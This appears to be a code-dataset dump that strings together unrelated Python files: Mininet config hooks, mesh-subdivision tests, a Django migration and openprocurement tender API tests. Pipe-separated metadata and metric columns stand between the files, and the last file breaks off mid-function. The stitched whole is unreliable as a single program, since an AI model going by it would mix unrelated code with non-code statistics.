

if __name__ == '__main__':
    test_examples_protocol_esp_http_client()
| 55.424242
| 134
| 0.698196
| 558
| 3,658
| 4.417563
| 0.179211
| 0.121704
| 0.126572
| 0.200406
| 0.926572
| 0.926572
| 0.899797
| 0.899797
| 0.899797
| 0.899797
| 0
| 0.045042
| 0.15637
| 3,658
| 65
| 135
| 56.276923
| 0.753727
| 0.092947
| 0
| 0.808511
| 0
| 0
| 0.478102
| 0.051703
| 0
| 0
| 0.00365
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.06383
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7cedcdc9b5b3e9cd899e568c98bcbba4b2513e16
| 517
|
py
|
Python
|
network-manager/config/null.py
|
netx-ulx/varanus
|
7df5ec70563253d72a4287566b1fbb6bdf804a4c
|
[
"Apache-2.0"
] | null | null | null |
network-manager/config/null.py
|
netx-ulx/varanus
|
7df5ec70563253d72a4287566b1fbb6bdf804a4c
|
[
"Apache-2.0"
] | null | null | null |
network-manager/config/null.py
|
netx-ulx/varanus
|
7df5ec70563253d72a4287566b1fbb6bdf804a4c
|
[
"Apache-2.0"
] | null | null | null |
def pre_start_config( _mr, _extra_args, _local_varanus_home ):
    """Hook invoked to configure a MininetRunner object before Mininet starts.

    - mr : a MininetRunner object
    - extra_args: extra arguments passed by the command line

    Null implementation: does nothing and returns True.
    """
    return True
def post_start_config( _mr, _extra_args, _local_varanus_home ):
    """ Configure a MininetRunner object after Mininet starts.
    - mr : a MininetRunner object
    - extra_args: extra arguments passed by the command line
    """
    # Null implementation: nothing to configure. Return True for consistency
    # with pre_start_config, which signals success the same way (previously
    # this fell through and returned None).
    return True
| 34.466667
| 64
| 0.676983
| 63
| 517
| 5.269841
| 0.444444
| 0.108434
| 0.240964
| 0.108434
| 0.885542
| 0.885542
| 0.885542
| 0.885542
| 0.885542
| 0.885542
| 0
| 0
| 0.261122
| 517
| 14
| 65
| 36.928571
| 0.86911
| 0.576402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.25
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
7ceec284c453f747b836c22022b37f8a529e3357
| 89
|
py
|
Python
|
convert/__init__.py
|
willismonroe/cdli-accounting-viz
|
cb7f8d2ec4b8ddbd831486fcf25a3ab7e65290e7
|
[
"MIT"
] | 3
|
2020-06-04T17:07:44.000Z
|
2020-06-15T19:45:31.000Z
|
convert/__init__.py
|
willismonroe/cdli-accounting-viz
|
cb7f8d2ec4b8ddbd831486fcf25a3ab7e65290e7
|
[
"MIT"
] | 17
|
2020-06-02T20:03:43.000Z
|
2020-08-27T18:47:36.000Z
|
convert/__init__.py
|
willismonroe/cdli-accounting-viz
|
cb7f8d2ec4b8ddbd831486fcf25a3ab7e65290e7
|
[
"MIT"
] | 3
|
2020-06-04T17:42:33.000Z
|
2020-08-26T19:27:50.000Z
|
import convert.number_system
import convert.convert_susa
import convert.convert_sumerian
| 22.25
| 31
| 0.898876
| 12
| 89
| 6.416667
| 0.5
| 0.506494
| 0.519481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067416
| 89
| 3
| 32
| 29.666667
| 0.927711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6b369832ddfab685eb884cdb757e5e8c160e6cbd
| 2,247
|
py
|
Python
|
tests/compas/datastructures/test_mesh_subd.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
tests/compas/datastructures/test_mesh_subd.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
tests/compas/datastructures/test_mesh_subd.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
import pytest
from compas.datastructures import Mesh
@pytest.fixture
def mesh_tris():
    """Hexahedron mesh with every quad face split into triangles."""
    box = Mesh.from_polyhedron(6)
    box.quads_to_triangles()
    return box
@pytest.fixture
def mesh_quads():
    """Hexahedron mesh with its original quad faces."""
    return Mesh.from_polyhedron(6)
def test_quads_subdivide(mesh_quads):
    """Default subdivision of a quad mesh: 4x faces, vertices become V+E+F."""
    subd = mesh_quads.subdivide()
    n_v = mesh_quads.number_of_vertices()
    n_e = mesh_quads.number_of_edges()
    n_f = mesh_quads.number_of_faces()
    assert subd.number_of_faces() == 4 * n_f
    assert subd.number_of_vertices() == n_v + n_e + n_f
def test_tris_subdivide(mesh_tris):
    """Default subdivision of a tri mesh: 3x faces, vertices become V+E+F."""
    subd = mesh_tris.subdivide()
    n_v = mesh_tris.number_of_vertices()
    n_e = mesh_tris.number_of_edges()
    n_f = mesh_tris.number_of_faces()
    assert subd.number_of_faces() == 3 * n_f
    assert subd.number_of_vertices() == n_v + n_e + n_f
def test_quads_subdivide_tri(mesh_quads):
    """'tri' scheme on a quad mesh: 4x faces, vertices become V+F."""
    subd = mesh_quads.subdivide(scheme='tri')
    n_f = mesh_quads.number_of_faces()
    assert subd.number_of_faces() == 4 * n_f
    assert subd.number_of_vertices() == mesh_quads.number_of_vertices() + n_f
def test_tris_subdivide_tri(mesh_tris):
    """'tri' scheme on a tri mesh: 3x faces, vertices become V+F."""
    subd = mesh_tris.subdivide(scheme='tri')
    n_f = mesh_tris.number_of_faces()
    assert subd.number_of_faces() == 3 * n_f
    assert subd.number_of_vertices() == mesh_tris.number_of_vertices() + n_f
def test_quads_subdivide_quad(mesh_quads):
    """'quad' scheme on a quad mesh: 4x faces, vertices become V+E+F."""
    subd = mesh_quads.subdivide(scheme='quad')
    n_v = mesh_quads.number_of_vertices()
    n_e = mesh_quads.number_of_edges()
    n_f = mesh_quads.number_of_faces()
    assert subd.number_of_faces() == 4 * n_f
    assert subd.number_of_vertices() == n_v + n_e + n_f
def test_tris_subdivide_quad(mesh_tris):
    """'quad' scheme on a tri mesh: 3x faces, vertices become V+E+F."""
    subd = mesh_tris.subdivide(scheme='quad')
    n_v = mesh_tris.number_of_vertices()
    n_e = mesh_tris.number_of_edges()
    n_f = mesh_tris.number_of_faces()
    assert subd.number_of_faces() == 3 * n_f
    assert subd.number_of_vertices() == n_v + n_e + n_f
| 36.836066
| 102
| 0.64575
| 283
| 2,247
| 4.689046
| 0.102474
| 0.204974
| 0.176338
| 0.162773
| 0.908063
| 0.837227
| 0.792012
| 0.728711
| 0.672947
| 0.618689
| 0
| 0.00477
| 0.253672
| 2,247
| 60
| 103
| 37.45
| 0.786524
| 0
| 0
| 0.55814
| 0
| 0
| 0.006231
| 0
| 0
| 0
| 0
| 0
| 0.27907
| 1
| 0.186047
| false
| 0
| 0.046512
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8633d5ea8314a6bddcc80c7ee880e3b9c12ae265
| 1,844
|
py
|
Python
|
pywolf/migrations/0018_auto_20180722_2259.py
|
tevawolf/pywolf
|
94e3c26d8c3b279990624f23658e22ab00eead46
|
[
"BSD-3-Clause"
] | null | null | null |
pywolf/migrations/0018_auto_20180722_2259.py
|
tevawolf/pywolf
|
94e3c26d8c3b279990624f23658e22ab00eead46
|
[
"BSD-3-Clause"
] | null | null | null |
pywolf/migrations/0018_auto_20180722_2259.py
|
tevawolf/pywolf
|
94e3c26d8c3b279990624f23658e22ab00eead46
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-07-22 13:59
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add max_str_length/max_voice_point columns to both voice-setting
    models and reset defaults on the village voice-setting fields.
    """

    dependencies = [
        ('pywolf', '0017_villageparticipantvoice_voice_order'),
    ]

    # Operations generated in the exact same order as the original
    # hand-listed version: four AddFields, then seven AlterFields.
    operations = [
        migrations.AddField(
            model_name=model,
            name=column,
            field=models.SmallIntegerField(default=0),
        )
        for model in ('mvoicesetting', 'villagevoicesetting')
        for column in ('max_str_length', 'max_voice_point')
    ] + [
        migrations.AlterField(
            model_name='villagevoicesetting',
            name=column,
            field=models.BooleanField(default=default),
        )
        for column, default in (
            ('epilogue_limit_off_flg', True),
            ('prologue_limit_off_flg', False),
            ('tomb_limit_off_flg', False),
        )
    ] + [
        migrations.AlterField(
            model_name='villagevoicesetting',
            name=column,
            field=models.SmallIntegerField(default=0),
        )
        for column in ('voice_number', 'voice_point')
    ]
| 31.254237
| 63
| 0.590564
| 156
| 1,844
| 6.782051
| 0.314103
| 0.07656
| 0.185255
| 0.21172
| 0.814745
| 0.814745
| 0.765595
| 0.628544
| 0.628544
| 0.628544
| 0
| 0.019577
| 0.307484
| 1,844
| 58
| 64
| 31.793103
| 0.808927
| 0.024403
| 0
| 0.75
| 1
| 0
| 0.193656
| 0.046745
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8675c8985cc9bcd8153ffb38062793bdc11a4fd0
| 67,852
|
py
|
Python
|
openprocurement/tender/limited/tests/tender_blanks.py
|
ProzorroUKR/openprocurement.tender.limited
|
cab6d0079c1ed9c54ce72a933ea8b26e6307a044
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/tender/limited/tests/tender_blanks.py
|
ProzorroUKR/openprocurement.tender.limited
|
cab6d0079c1ed9c54ce72a933ea8b26e6307a044
|
[
"Apache-2.0"
] | 4
|
2018-08-14T19:40:57.000Z
|
2019-01-25T05:42:04.000Z
|
openprocurement/tender/limited/tests/tender_blanks.py
|
ProzorroUKR/openprocurement.tender.limited
|
cab6d0079c1ed9c54ce72a933ea8b26e6307a044
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from copy import deepcopy
from uuid import uuid4
from openprocurement.api.utils import get_now
from openprocurement.api.constants import ROUTE_PREFIX, CPV_ITEMS_CLASS_FROM, \
NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM
from openprocurement.tender.belowthreshold.tests.base import test_organization
from openprocurement.tender.limited.models import (
NegotiationTender,
NegotiationQuickTender,
ReportingTender
)
# AccreditationTenderTest
def create_tender_accreditation(self):
    """Only brokers with a permitted accreditation level may create tenders."""
    denied = "Broker Accreditation level does not permit tender creation"
    # Accredited brokers: creation succeeds.
    for broker in ('broker1', 'broker3'):
        self.app.authorization = ('Basic', (broker, ''))
        response = self.app.post_json('/tenders', {"data": self.initial_data})
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
    # Brokers without the required level: 403 with an explanatory error.
    for broker in ('broker2', 'broker4'):
        self.app.authorization = ('Basic', (broker, ''))
        response = self.app.post_json('/tenders', {"data": self.initial_data}, status=403)
        self.assertEqual(response.status, '403 Forbidden')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['errors'][0]["description"], denied)
    # 'broker1t' is rejected too — NOTE(review): presumably a mode-restricted
    # accreditation variant; confirm against the accreditation config.
    self.app.authorization = ('Basic', ('broker1t', ''))
    response = self.app.post_json('/tenders', {"data": self.initial_data}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], denied)
# TenderTest
def simple_add_tender(self):
    """Round-trip a ReportingTender through the database."""
    tender = ReportingTender(self.initial_data)
    tender.tenderID = "UA-X"
    # An unsaved model has neither an id nor a revision.
    assert tender.id is None
    assert tender.rev is None
    tender.store(self.db)
    # Both are assigned by store().
    assert tender.id is not None
    assert tender.rev is not None
    stored = self.db.get(tender.id)
    assert stored['tenderID'] == tender.tenderID
    assert tender.doc_type == "Tender"
    assert tender.procurementMethodType == "reporting"
    assert stored['procurementMethodType'] == tender.procurementMethodType
    tender.delete_instance(self.db)
# TenderNegotiationTest
def simple_add_tender_negotiation(self):
    """Round-trip a NegotiationTender through the database."""
    tender = NegotiationTender(self.initial_data)
    tender.tenderID = "UA-X"
    # An unsaved model has neither an id nor a revision.
    assert tender.id is None
    assert tender.rev is None
    tender.store(self.db)
    # Both are assigned by store().
    assert tender.id is not None
    assert tender.rev is not None
    stored = self.db.get(tender.id)
    assert stored['tenderID'] == tender.tenderID
    assert tender.doc_type == "Tender"
    assert tender.procurementMethodType == "negotiation"
    assert stored['procurementMethodType'] == tender.procurementMethodType
    tender.delete_instance(self.db)
# TenderNegotiationQuickTest
def simple_add_tender_negotiation_quick(self):
    """Round-trip a NegotiationQuickTender through the database."""
    tender = NegotiationQuickTender(self.initial_data)
    tender.tenderID = "UA-X"
    # An unsaved model has neither an id nor a revision.
    assert tender.id is None
    assert tender.rev is None
    tender.store(self.db)
    # Both are assigned by store().
    assert tender.id is not None
    assert tender.rev is not None
    stored = self.db.get(tender.id)
    assert stored['tenderID'] == tender.tenderID
    assert tender.doc_type == "Tender"
    assert tender.procurementMethodType == "negotiation.quick"
    assert stored['procurementMethodType'] == tender.procurementMethodType
    tender.delete_instance(self.db)
# TenderResourceTest
def listing(self):
    """Exercise the /tenders listing endpoint end to end.

    Covers: the empty listing, creation of three tenders, offset queries,
    limit/next_page paging, opt_fields projection, descending order, and
    mode=test filtering. The while-True loops retry the GET until the
    expected number of entries appears (the listing lags writes).
    """
    # Empty database: the listing has no entries.
    response = self.app.get('/tenders')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 0)
    tenders = []
    # Create three tenders. `offset` is overwritten each pass, so after the
    # loop it holds the timestamp taken just before the LAST post.
    for i in range(3):
        offset = get_now().isoformat()
        response = self.app.post_json('/tenders', {'data': self.initial_data})
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        tenders.append(response.json['data'])
    ids = ','.join([i['id'] for i in tenders])
    # Poll until all three tenders are visible in the listing.
    while True:
        response = self.app.get('/tenders')
        self.assertTrue(ids.startswith(','.join([i['id'] for i in response.json['data']])))
        if len(response.json['data']) == 3:
            break
    # Entries expose only id + dateModified, ascending by dateModified.
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
    self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
    self.assertEqual(set([i['dateModified'] for i in response.json['data']]),
                     set([i['dateModified'] for i in tenders]))
    self.assertEqual([i['dateModified'] for i in response.json['data']],
                     sorted([i['dateModified'] for i in tenders]))
    # Only the one tender created after `offset` should be returned.
    while True:
        response = self.app.get('/tenders?offset={}'.format(offset))
        self.assertEqual(response.status, '200 OK')
        if len(response.json['data']) == 1:
            break
    self.assertEqual(len(response.json['data']), 1)
    # Paging: limit=2, then follow next_page twice (1 entry, then empty);
    # the returned prev_page links carry descending=1.
    response = self.app.get('/tenders?limit=2')
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('prev_page', response.json)
    self.assertEqual(len(response.json['data']), 2)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 1)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 0)
    # opt_fields adds the requested field to every entry and is propagated
    # into the next_page link. (Same request issued twice in the original.)
    response = self.app.get('/tenders', params=[('opt_fields', 'status')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
    self.assertIn('opt_fields=status', response.json['next_page']['uri'])
    response = self.app.get('/tenders', params=[('opt_fields', 'status')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
    self.assertIn('opt_fields=status', response.json['next_page']['uri'])
    # Descending order reverses the dateModified sort.
    response = self.app.get('/tenders?descending=1')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
    self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
    self.assertEqual([i['dateModified'] for i in response.json['data']],
                     sorted([i['dateModified'] for i in tenders], reverse=True))
    # Descending paging: prev_page links do NOT carry descending=1.
    response = self.app.get('/tenders?descending=1&limit=2')
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 2)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 1)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 0)
    # A mode=test tender only appears with ?mode=test; ?mode=_all_ shows
    # every tender (3 regular + 1 test).
    test_tender_data2 = self.initial_data.copy()
    test_tender_data2['mode'] = 'test'
    response = self.app.post_json('/tenders', {'data': test_tender_data2})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    while True:
        response = self.app.get('/tenders?mode=test')
        self.assertEqual(response.status, '200 OK')
        if len(response.json['data']) == 1:
            break
    self.assertEqual(len(response.json['data']), 1)
    response = self.app.get('/tenders?mode=_all_')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 4)
def tender_award_create(self):
    """Awards and contracts supplied at creation time are not echoed back
    in the created tender."""
    award_id = "1234" * 8
    payload = self.initial_data.copy()
    payload['awards'] = [{
        'suppliers': [test_organization],
        'subcontractingDetails': 'Details',
        'status': 'pending',
        'qualified': True,
        'id': award_id,
    }]
    payload['contracts'] = [{
        'title': 'contract title',
        'description': 'contract description',
        'awardID': award_id,
    }]
    response = self.app.post_json('/tenders', {'data': payload})
    self.assertEqual(response.status, '201 Created')
    self.assertNotIn('contracts', response.json['data'])
    self.assertNotIn('awards', response.json['data'])
def listing_changes(self):
    """Exercise the /tenders listing with feed=changes.

    Same coverage as `listing` but over the changes feed: empty feed,
    creation of three tenders, limit/next_page paging, opt_fields
    projection, descending order, and mode=test filtering. The while-True
    loops retry the GET until the expected number of entries appears.
    """
    # Empty database: the changes feed has no entries.
    response = self.app.get('/tenders?feed=changes')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 0)
    tenders = []
    # Create three tenders.
    for i in range(3):
        response = self.app.post_json('/tenders', {'data': self.initial_data})
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        tenders.append(response.json['data'])
    ids = ','.join([i['id'] for i in tenders])
    # Poll until all three tenders are visible in the feed.
    while True:
        response = self.app.get('/tenders?feed=changes')
        self.assertTrue(ids.startswith(','.join([i['id'] for i in response.json['data']])))
        if len(response.json['data']) == 3:
            break
    # Entries expose only id + dateModified, ascending by dateModified.
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
    self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
    self.assertEqual(set([i['dateModified'] for i in response.json['data']]),
                     set([i['dateModified'] for i in tenders]))
    self.assertEqual([i['dateModified'] for i in response.json['data']],
                     sorted([i['dateModified'] for i in tenders]))
    # Paging: limit=2, then follow next_page twice (1 entry, then empty);
    # the returned prev_page links carry descending=1.
    response = self.app.get('/tenders?feed=changes&limit=2')
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('prev_page', response.json)
    self.assertEqual(len(response.json['data']), 2)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 1)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 0)
    # opt_fields adds the requested field and is kept in the next_page link.
    response = self.app.get('/tenders?feed=changes', params=[('opt_fields', 'status')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
    self.assertIn('opt_fields=status', response.json['next_page']['uri'])
    # 'enquiryPeriod' is requested too, but the asserted entry keys are
    # still only id/dateModified/status — i.e. it is not exposed here.
    response = self.app.get('/tenders?feed=changes', params=[('opt_fields', 'status,enquiryPeriod')])
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
    self.assertIn('opt_fields=status', response.json['next_page']['uri'])
    # Descending order reverses the dateModified sort.
    response = self.app.get('/tenders?feed=changes&descending=1')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(len(response.json['data']), 3)
    self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
    self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
    self.assertEqual([i['dateModified'] for i in response.json['data']],
                     sorted([i['dateModified'] for i in tenders], reverse=True))
    # Descending paging: prev_page links do NOT carry descending=1.
    response = self.app.get('/tenders?feed=changes&descending=1&limit=2')
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 2)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 1)
    response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
    self.assertEqual(response.status, '200 OK')
    self.assertNotIn('descending=1', response.json['prev_page']['uri'])
    self.assertEqual(len(response.json['data']), 0)
    # A mode=test tender only appears with mode=test; mode=_all_ shows all 4.
    test_tender_data2 = self.initial_data.copy()
    test_tender_data2['mode'] = 'test'
    response = self.app.post_json('/tenders', {'data': test_tender_data2})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    while True:
        response = self.app.get('/tenders?feed=changes&mode=test')
        self.assertEqual(response.status, '200 OK')
        if len(response.json['data']) == 1:
            break
    self.assertEqual(len(response.json['data']), 1)
    response = self.app.get('/tenders?feed=changes&mode=_all_')
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(len(response.json['data']), 4)
def create_tender_invalid(self):
    """Exhaustive negative cases for POST /tenders.

    Covers bad content types, unparsable bodies, missing/rogue/ill-typed
    fields and invalid item classification combinations, asserting the
    exact error payload for each.  Every mutation of ``self.initial_data``
    is reverted right after the request so the shared fixture stays
    pristine for later cases and other tests.
    """
    request_path = '/tenders'
    # --- transport-level validation ---
    # Non-JSON content type is rejected up front.
    response = self.app.post(request_path, 'data', status=415)
    self.assertEqual(response.status, '415 Unsupported Media Type')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description':
            u"Content-Type header should be one of ['application/json']", u'location': u'header',
         u'name': u'Content-Type'}
    ])
    # JSON content type but a body that does not parse as JSON.
    response = self.app.post(
        request_path, 'data', content_type='application/json', status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'No JSON object could be decoded',
         u'location': u'body', u'name': u'data'}
    ])
    # --- envelope validation: 'data' key must hold a mapping ---
    # A bare JSON string instead of an object.
    response = self.app.post_json(request_path, 'data', status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Data not available',
         u'location': u'body', u'name': u'data'}
    ])
    # An object without the 'data' key.
    response = self.app.post_json(request_path, {'not_data': {}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Data not available',
         u'location': u'body', u'name': u'data'}
    ])
    # 'data' present but not a mapping.
    response = self.app.post_json(request_path, {'data': []}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Data not available',
         u'location': u'body', u'name': u'data'}
    ])
    # --- field-level validation ---
    # Unknown fields are reported as rogue.
    response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'reporting',
                                                          'invalid_field': 'invalid_value'}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': u'Rogue field', u'location':
            u'body', u'name': u'invalid_field'}
    ])
    # A scalar where a Value mapping is expected.
    response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'reporting',
                                                          'value': 'invalid_value'}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertEqual(response.json['errors'], [
        {u'description': [
            u'Please use a mapping for this field or Value instance instead of unicode.'], u'location': u'body',
         u'name': u'value'}
    ])
    # Invalid enum value, plus the required-field errors surfaced in the
    # same response (order unspecified, hence assertIn).
    response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'reporting',
                                                          'procurementMethod': 'invalid_value'}}, status=422)
    self.assertEqual(response.status, '422 Unprocessable Entity')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['status'], 'error')
    self.assertIn(
        {u'description': [u"Value must be one of ['open', 'selective', 'limited']."], u'location': u'body',
         u'name': u'procurementMethod'}, response.json['errors'])
    self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'items'},
                  response.json['errors'])
    self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'value'},
                  response.json['errors'])
    # --- item classification rules ---
    # Missing additionalClassifications: required only before the
    # NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM cut-over date.
    data = self.initial_data["items"][0].pop("additionalClassifications")
    if get_now() > CPV_ITEMS_CLASS_FROM:
        cpv_code = self.initial_data["items"][0]['classification']['id']
        self.initial_data["items"][0]['classification']['id'] = '99999999-9'
    status = 422 if get_now() < NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM else 201
    response = self.app.post_json(request_path, {'data': self.initial_data}, status=status)
    self.initial_data["items"][0]["additionalClassifications"] = data
    if get_now() > CPV_ITEMS_CLASS_FROM:
        self.initial_data["items"][0]['classification']['id'] = cpv_code
    if status == 201:
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
    else:
        self.assertEqual(response.status, '422 Unprocessable Entity')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['status'], 'error')
        self.assertEqual(response.json['errors'], [
            {u'description': [{u'additionalClassifications': [u'This field is required.']}], u'location': u'body',
             u'name': u'items'}
        ])
    # Unknown additional-classification scheme; the accepted scheme list
    # differs before/after the CPV_ITEMS_CLASS_FROM cut-over date.
    data = self.initial_data["items"][0]["additionalClassifications"][0]["scheme"]
    self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = 'Не ДКПП'
